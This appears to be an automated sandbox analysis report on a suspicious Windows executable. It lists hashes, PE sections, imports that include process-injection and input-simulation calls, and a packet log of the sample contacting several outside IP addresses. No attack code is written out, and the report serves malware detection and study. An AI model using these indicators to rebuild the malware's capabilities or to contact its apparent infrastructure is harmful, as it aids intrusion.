TLSH:	AE55D013B5CD813DC2A326B1BE7AF37596386F270326D19737C8AD2D1E601492B257E2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

File Icon


Icon Hash:	24ed8d96b2ade832

Static PE Info

General

Entrypoint:	0x4165c1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d3bf8a7746a8d1ee8f6e5960c3f69378

Entrypoint Preview

Instruction
call 00007FBA38CE986Bh
jmp 00007FBA38CE06DEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FBA38CE085Ah
cmp edi, eax
jc 00007FBA38CE09F6h
cmp ecx, 00000080h
jc 00007FBA38CE086Eh
cmp dword ptr [004A9724h], 00000000h
je 00007FBA38CE0865h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FBA38CE0857h
jmp 00007FBA38CE0C32h
test edi, 00000003h
jne 00007FBA38CE0866h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FBA38CE087Bh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FBA38CE085Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007FBA3B159057h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FBA38CE081Eh
rep movsd
jmp dword ptr [00000000h+edx*4]

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d41c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x10178	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x844	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8061c	0x80800	61ffce4768976fa0dd2a8f6a97b1417a	False	0.5583182605787937	data	6.684690148171278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xdfc0	0xe000	0354bc5f2376b5e9a4a3ba38b682dff1	False	0.36085728236607145	data	4.799741132252136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a758	0x6800	8033f5a38941b4685bc2299e78f31221	False	0.15324519230769232	data	2.1500715391677487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x10178	0x10200	f815ae6916a7f0ea50892f76abc60926	False	0.11670300387596899	data	4.051633659343264	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab448	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab570	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab698	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab7c0	0xd228	Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m	English	Great Britain	0.07864312267657993
RT_MENU	0xb89e8	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb8a38	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb8b38	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb9068	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb96f8	0x4d0	data	English	Great Britain	0.36363636363636365
RT_STRING	0xb9bc8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xba1c8	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xba828	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xbabb0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xbad08	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xbad20	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xbad38	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xbad50	0x14	data	English	Great Britain	1.25
RT_VERSION	0xbad68	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xbaf08	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll	GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll	DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll	VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 09:07:57.331830978 CEST	49712	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:07:57.336766005 CEST	80	49712	3.33.130.190	192.168.2.5
Sep 27, 2024 09:07:57.336858988 CEST	49712	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:07:57.344508886 CEST	49712	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:07:57.349550009 CEST	80	49712	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:04.850677967 CEST	80	49712	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:04.850732088 CEST	80	49712	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:04.850842953 CEST	49712	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:08:04.854033947 CEST	49712	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:08:04.858864069 CEST	80	49712	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:15.043430090 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:15.048309088 CEST	80	49713	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:15.048403025 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:15.103463888 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:15.108426094 CEST	80	49713	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:15.712882996 CEST	80	49713	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:15.712937117 CEST	80	49713	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:15.712970972 CEST	80	49713	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:15.713006973 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:15.713103056 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:16.615341902 CEST	49713	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:17.633871078 CEST	49714	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:17.638897896 CEST	80	49714	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:17.638992071 CEST	49714	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:17.647696972 CEST	49714	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:17.652945042 CEST	80	49714	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:18.277955055 CEST	80	49714	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:18.277988911 CEST	80	49714	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:18.278007984 CEST	80	49714	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:18.278104067 CEST	49714	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:19.162240028 CEST	49714	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:20.182043076 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:20.365098000 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:20.365370035 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:20.421360016 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:20.426496983 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:20.426603079 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:21.110012054 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:21.110044003 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:21.110070944 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:21.110096931 CEST	80	49715	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:21.110120058 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:21.110165119 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:21.927805901 CEST	49715	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:22.946525097 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:22.951512098 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:22.951589108 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:22.961647987 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:22.966849089 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600423098 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600482941 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600519896 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600550890 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600558996 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:23.600586891 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600657940 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:23.600786924 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:23.600846052 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:23.604415894 CEST	49716	80	192.168.2.5	217.160.0.27
Sep 27, 2024 09:08:23.609226942 CEST	80	49716	217.160.0.27	192.168.2.5
Sep 27, 2024 09:08:31.210853100 CEST	49717	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:31.215729952 CEST	80	49717	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:31.215806007 CEST	49717	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:31.226924896 CEST	49717	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:31.231828928 CEST	80	49717	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:32.105614901 CEST	80	49717	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:32.105669022 CEST	80	49717	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:32.105735064 CEST	49717	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:32.740308046 CEST	49717	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:33.758614063 CEST	49718	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:33.763659954 CEST	80	49718	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:33.763746977 CEST	49718	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:33.772583961 CEST	49718	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:33.777491093 CEST	80	49718	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:34.633534908 CEST	80	49718	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:34.633774042 CEST	80	49718	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:34.633840084 CEST	49718	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:35.287216902 CEST	49718	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:36.305536032 CEST	49719	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:36.311925888 CEST	80	49719	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:36.312030077 CEST	49719	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:36.320971012 CEST	49719	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:36.326581955 CEST	80	49719	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:36.328176975 CEST	80	49719	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:37.182132959 CEST	80	49719	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:37.182430983 CEST	80	49719	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:37.182482958 CEST	49719	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:37.834033012 CEST	49719	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:38.852593899 CEST	49720	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:38.857754946 CEST	80	49720	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:38.857866049 CEST	49720	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:38.863893986 CEST	49720	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:38.868943930 CEST	80	49720	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:39.718422890 CEST	80	49720	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:39.718503952 CEST	80	49720	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:39.718734980 CEST	49720	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:39.721198082 CEST	49720	80	192.168.2.5	20.2.217.253
Sep 27, 2024 09:08:39.726074934 CEST	80	49720	20.2.217.253	192.168.2.5
Sep 27, 2024 09:08:45.224948883 CEST	49721	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:45.229895115 CEST	80	49721	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:45.229996920 CEST	49721	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:45.241005898 CEST	49721	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:45.245946884 CEST	80	49721	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:46.112279892 CEST	80	49721	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:46.112339973 CEST	80	49721	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:46.112462044 CEST	49721	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:46.755899906 CEST	49721	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:47.774061918 CEST	49722	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:47.779186010 CEST	80	49722	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:47.779427052 CEST	49722	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:47.788252115 CEST	49722	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:47.793241024 CEST	80	49722	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:48.682331085 CEST	80	49722	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:48.682488918 CEST	80	49722	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:48.682674885 CEST	49722	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:49.302879095 CEST	49722	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:50.323815107 CEST	49723	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:50.328872919 CEST	80	49723	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:50.331264973 CEST	49723	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:50.363095999 CEST	49723	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:50.367968082 CEST	80	49723	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:50.368123055 CEST	80	49723	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:51.235686064 CEST	80	49723	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:51.235775948 CEST	80	49723	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:51.235856056 CEST	49723	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:51.865370989 CEST	49723	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:52.915014029 CEST	49724	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:52.920027971 CEST	80	49724	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:52.920106888 CEST	49724	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:52.939517021 CEST	49724	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:52.944449902 CEST	80	49724	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:53.830423117 CEST	80	49724	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:53.830517054 CEST	80	49724	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:53.830673933 CEST	49724	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:53.834178925 CEST	49724	80	192.168.2.5	38.55.251.233
Sep 27, 2024 09:08:53.838995934 CEST	80	49724	38.55.251.233	192.168.2.5
Sep 27, 2024 09:08:58.974745989 CEST	49725	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:08:58.979609013 CEST	80	49725	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:58.979799986 CEST	49725	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:08:58.990962982 CEST	49725	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:08:58.995834112 CEST	80	49725	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:59.444253922 CEST	80	49725	3.33.130.190	192.168.2.5
Sep 27, 2024 09:08:59.444354057 CEST	49725	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:09:00.505959034 CEST	49725	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:09:00.662705898 CEST	80	49725	3.33.130.190	192.168.2.5
Sep 27, 2024 09:09:01.884262085 CEST	49726	80	192.168.2.5	3.33.130.190
Sep 27, 2024 09:09:01.889379025 CEST	80	49726	3.33.130.190	192.168.2.5
